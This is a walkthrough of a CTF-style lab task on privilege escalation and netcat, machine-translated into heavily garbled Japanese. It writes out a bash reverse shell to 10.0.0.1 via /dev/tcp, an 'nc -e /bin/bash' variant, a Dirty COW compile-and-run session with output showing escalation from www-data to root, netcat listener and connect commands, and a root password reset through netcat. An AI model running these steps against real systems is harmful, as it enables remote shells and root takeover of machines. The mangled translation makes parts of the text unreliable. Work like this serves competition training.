タスキング環境の説明:
攻撃:
物理マシン:のWindows7
物理的なインストールツール1:マイクロソフトのVisual Studio 2008
物理的なインストールツール2:OllyICE
仮想マシン1:Ubuntu_Linux
仮想マシン1インストールツール1:のpython3 / Python2
1つの仮想マシンのインストールツール2:GCC
1つの仮想マシンのインストールツール3:GDB
1つの仮想マシンのインストールツール4:Netcatを
1台の仮想マシンのユーザー名:ルート、パスワード仮想マシン1:123456
仮想マシンのオペレーティングシステム2:CentOS_Linux
2仮想マシンのインストールツール1:GCC
2つの仮想マシンのインストールツール2:GDB
仮想マシン2ユーザー名:ルート、VM 2パスワード:123456
ドローン:
サーバーシナリオ1:WindowsServer
FTPサーバーシナリオ1件のダウンロードサービスのユーザー名:匿名
サーバーシナリオ2:LinuxServer_01
概要:
シーンにログイン現在のシステムに関連する関連情報を用いて印刷(カーネルバージョン番号、ハードウェアアーキテクチャ、ホスト名、およびオペレーティング・システム・タイプは、ファイルを表示しないコマンド)、2ウェブシェルは、動作指令FLAG値として送信されます。
答え:のuname -a
bashの-i>&/dev/tcp/10.0.0.1/8080 0>:#取得ウェブシェルトピックは、あなたすることはできません直接リバウンドbashのコマンドを使用して、直接NC NC -e / binに/ bashのがあれば、立ち直るする必要があります&1
2.エコーカーネルバージョンは、フラグ操作コマンドなどの情報の値に応じて送信されます。
運転指令:のuname -r
ファイルサーバのシナリオをアップロードする権利、プロンプトの言葉はすべてFLAG値として提出成功に言及し、関連する2により3。
明確な言及は正しい方法ではない何か、それは答えることができません。
疑わ:汚い牛、CVE-2017から16995 ....
汚い牛:
www-data@medidor2:/tmp$gcc -Wall -o hello dirtycow-mem.c -ldl -lpthread
www-data@medidor2:/tmp$ ls
hello
www-data@medidor2:/tmp$ chmod +x hello
www-data@medidor2:/tmp$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data) www-data@medidor2:/tmp$ ./hello [*] range: b7573000-b7716000] [*] getuid = b762bd10 [*] mmap 0xb73cb000 [*] exploiting (patch) [*] patched (madviseThread) [*] patched (procselfmemThread) root@medidor2:/tmp# [*] exploiting (unpatch) [*] unpatched: uid=33 (madviseThread) [*] unpatched: uid=33 (procselfmemThread) root@medidor2:/tmp# id uid=0(root) gid=0(root) groups=0(root)
CVE-2017から16995の直接コンパイラはgcc -o EXP exp.cことができます。
汚い牛:汚い牛を使用して、実行するようにコンパイルはgcc -pthread dirty.c -o汚い-lcryptは、バックアップ用の/ etcに/ passwdのことに留意すべきである、そして/ etc / passwdファイルの書き換えは、アカウントの権限を変更します。
モードNC、出力相互情報やエラー情報をリスニングし、ポート8081をリッスンし、仮想マシンの攻撃で4、FLAG指令値として提出しました。
コマンド:NC -lvvp 8081
関連した手段を介して接続された攻撃のシナリオサーバ2 NC、第4ワード提出FLAG値と有意に三行後の陽性結果の成功リターンから仮想マシン1。
コマンド:netcatをIPポート
関連手段を通じてNC接続に成功2、サーバ仮想マシン1シーンへの攻撃機後6は、rootのパスワードを変更するには、関連するコマンドによって、それは彼のパーティーの後に提出したFLAG値として最後の三つの言葉で応答します。
コマンド:LinuxはNC経由でパスワードを変更するためのコマンド:qqadminsshエコー| passwdを--stdinルート
7.あなたがあなたのパスワードを変更すると、バックFLAG値として提出最後の二つの重要な単語の最後の行に、/root/flag.txtファイルを表示します。
コマンド:猫/root/flag.txt
8.現在のユーザーは、右、ティムを成功させる権利を言及/root/flag.txt再び見て、エコーコンテンツの後に提出したFLAG値として二つの言葉。
コマンド:猫/root/flag.txt
あなたはあなたに有益な記事を見つけた場合は、下記のQRコードをスキャンすることで報酬することができます。
- >マイクロ手紙< - - >アリペイ< -